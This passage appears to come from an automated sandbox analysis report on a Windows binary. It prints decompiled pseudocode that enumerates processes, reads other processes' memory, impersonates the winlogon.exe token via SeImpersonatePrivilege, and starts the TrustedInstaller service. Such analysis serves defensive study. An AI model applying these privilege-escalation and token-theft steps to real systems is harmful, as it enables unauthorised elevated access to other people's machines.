                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                                                                                                                          • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3201562063-2355939583
                                                                                                                                                                                                                          • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                          				char _v576;
                                                                                                                                                                                                                          				long _v580;
                                                                                                                                                                                                                          				intOrPtr _v1112;
                                                                                                                                                                                                                          				long _v1128;
                                                                                                                                                                                                                          				void _v1132;
                                                                                                                                                                                                                          				void* _v1136;
                                                                                                                                                                                                                          				void _v1658;
                                                                                                                                                                                                                          				char _v1660;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                          				int _t46;
                                                                                                                                                                                                                          				long _t49;
                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t68;
                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t78 = _a4;
                                                                                                                                                                                                                          				E004099D4(_a4 + 0x28);
                                                                                                                                                                                                                          				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                          				_v12 = _t41;
                                                                                                                                                                                                                          				memset( &_v1132, 0, 0x228);
                                                                                                                                                                                                                          				_t84 = _t83 + 0xc;
                                                                                                                                                                                                                          				_v1136 = 0x22c;
                                                                                                                                                                                                                          				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                          					_t46 = Process32NextW(_v12,  &_v1136); // executed
                                                                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					E004090AF( &_v580);
                                                                                                                                                                                                                          					_t49 = _v1128;
                                                                                                                                                                                                                          					_v580 = _t49;
                                                                                                                                                                                                                          					_v52 = _v1112;
                                                                                                                                                                                                                          					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                                                                                                                                          					_v8 = _t50;
                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                                          						_v1660 = 0;
                                                                                                                                                                                                                          						memset( &_v1658, 0, 0x208);
                                                                                                                                                                                                                          						_t85 = _t84 + 0xc;
                                                                                                                                                                                                                          						E004098F9(_t78, _v8,  &_v1660);
                                                                                                                                                                                                                          						if(_v1660 != 0) {
                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                          							E0040920A( &_v576,  &_v1660);
                                                                                                                                                                                                                          							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                                                                                                                          							_t84 = _t85 + 0x14;
                                                                                                                                                                                                                          							CloseHandle(_v8);
                                                                                                                                                                                                                          							_t78 = _a4;
                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                          							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v16 = 0x104;
                                                                                                                                                                                                                          						if( *0x41c8e0 == 0) {
                                                                                                                                                                                                                          							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                          								 *0x41c8e0 = 1;
                                                                                                                                                                                                                          								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t66 =  *0x41c8e4;
                                                                                                                                                                                                                          						if(_t66 != 0) {
                                                                                                                                                                                                                          							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                                                                                                                                          					_v8 = _t71;
                                                                                                                                                                                                                          					if(_t71 == 0) {
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return CloseHandle(_v12);
                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004096C6
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                                                                                                                          • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 239888749-1740548384
                                                                                                                                                                                                                          • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409921(struct HINSTANCE__** __esi) {
                                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t7;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t12;
                                                                                                                                                                                                                          				CHAR* _t13;
                                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *__esi == 0) {
                                                                                                                                                                                                                          					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                                                                                                                                          					 *_t17 = "GetModuleBaseNameW";
                                                                                                                                                                                                                          					 *__esi = _t7;
                                                                                                                                                                                                                          					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                                                                                                                                          					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                                                                                                                          					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                                                                                                                          					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                                                                                                                          					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                                                                                                                          					__esi[3] = _t12;
                                                                                                                                                                                                                          					return _t12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t6;
                                                                                                                                                                                                                          			}









APIs
  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
Strings
Memory Dump Source
• Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$LibraryLoad$memsetwcscat
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 1529661771-70141382
• Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
• Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
• Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
• Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
• Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
• Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
• Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                          			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                          				void _v538;
                                                                                                                                                                                                                          				char _v540;
                                                                                                                                                                                                                          				int _v548;
                                                                                                                                                                                                                          				char _v564;
                                                                                                                                                                                                                          				char _v22292;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                          				int _t45;
                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                          				long _t61;
                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                          				long _t69;
                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t67 = __edx;
                                                                                                                                                                                                                          				E0040B550(0x5714, __ecx);
                                                                                                                                                                                                                          				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                                                                                                                                          				_t82 = _t37;
                                                                                                                                                                                                                          				_a16 = _t37;
                                                                                                                                                                                                                          				if(_t37 == 0) {
                                                                                                                                                                                                                          					_t69 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t72 =  &_v22292;
                                                                                                                                                                                                                          					E0040171F(_t72, _t82);
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
                                                                                                                                                                                                                          					if(_t43 == 0) {
                                                                                                                                                                                                                          						_t69 = GetLastError();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t48 = E00405642( &_v564);
                                                                                                                                                                                                                          						_t74 = _v548;
                                                                                                                                                                                                                          						_t70 = _t48;
                                                                                                                                                                                                                          						_a12 = _t74;
                                                                                                                                                                                                                          						_v540 = 0;
                                                                                                                                                                                                                          						memset( &_v538, 0, 0x1fe);
                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                          						_push(_t67);
                                                                                                                                                                                                                          						_push(_t74);
                                                                                                                                                                                                                          						_push(_t70);
                                                                                                                                                                                                                          						_push(L"%d  %I64x");
                                                                                                                                                                                                                          						_push(0xff);
                                                                                                                                                                                                                          						_push( &_v540);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_v548 = 0;
                                                                                                                                                                                                                          						E004055D1( &_v540,  &_v564);
                                                                                                                                                                                                                          						_t16 = _t70 + 0xa; // 0xa
                                                                                                                                                                                                                          						_t68 = _t16;
                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                          						_v16 = 0x100;
                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                          						E0040559A( &_v28, _t16);
                                                                                                                                                                                                                          						_t76 = _v12;
                                                                                                                                                                                                                          						_t56 = 0x40c4e8;
                                                                                                                                                                                                                          						if(_t76 != 0) {
                                                                                                                                                                                                                          							_t56 = _t76;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t26 = _t70 + 2; // 0x2
                                                                                                                                                                                                                          						_t66 = _t70 + _t26;
                                                                                                                                                                                                                          						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
                                                                                                                                                                                                                          						_t85 = _t76;
                                                                                                                                                                                                                          						if(_t76 == 0) {
                                                                                                                                                                                                                          							_t76 = 0x40c4e8;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                                                                                                                                          						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
                                                                                                                                                                                                                          						_t69 = _t61;
                                                                                                                                                                                                                          						E004055D1(_t61,  &_v28);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t45 = FindCloseChangeNotification(_a16); // executed
                                                                                                                                                                                                                          					E004055D1(_t45,  &_v564);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t69;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401B4A
                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                            • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %d %I64x
                                                                                                                                                                                                                          • API String ID: 1126726007-2565891505
                                                                                                                                                                                                                          • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                                                                                                                          • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				void _v538;
                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                          				void _v1066;
                                                                                                                                                                                                                          				char _v1068;
                                                                                                                                                                                                                          				long _t30;
                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          				long _t49;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t45 = __edx;
                                                                                                                                                                                                                          				_v540 = 0;
                                                                                                                                                                                                                          				memset( &_v538, 0, 0x208);
                                                                                                                                                                                                                          				_v1068 = 0;
                                                                                                                                                                                                                          				memset( &_v1066, 0, 0x208);
                                                                                                                                                                                                                          				E00404C3C( &_v540);
                                                                                                                                                                                                                          				_t48 = L"winlogon.exe";
                                                                                                                                                                                                                          				_t39 = wcslen(L"winlogon.exe");
                                                                                                                                                                                                                          				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                                                                                                                                          				_t53 = _t39 + _t8 - 0x104;
                                                                                                                                                                                                                          				_pop(_t42);
                                                                                                                                                                                                                          				if(_t39 + _t8 >= 0x104) {
                                                                                                                                                                                                                          					_v1068 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                                                                                                                                          					_pop(_t42);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                                                                                                                                          				_t49 = _t30;
                                                                                                                                                                                                                          				_t54 = _t49;
                                                                                                                                                                                                                          				if(_t49 == 0) {
                                                                                                                                                                                                                          					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                                                                                                                                          					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                                                                                                                                          					if(_t33 == 0) {
                                                                                                                                                                                                                          						_t49 = GetLastError();
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					CloseHandle(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t49;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F27
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F3F
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F5A
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F69
                                                                                                                                                                                                                          • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                                                                                                                          • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3867304300-2177360481
                                                                                                                                                                                                                          • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00401306(void* _a4) {
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				struct _SERVICE_STATUS _v32;
                                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t12 = 0; // executed
                                                                                                                                                                                                                          				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                                                                                                                                          				_t14 = _t5;
                                                                                                                                                                                                                          				if(_t14 != 0) {
                                                                                                                                                                                                                          					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                                                                                                                                          						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					CloseServiceHandle(_t14);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				CloseServiceHandle(_a4);
                                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                                                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                                                                                                                          • String ID: TrustedInstaller
                                                                                                                                                                                                                          • API String ID: 862991418-565535830
                                                                                                                                                                                                                          • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t9;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x41c8e8 == 0) {
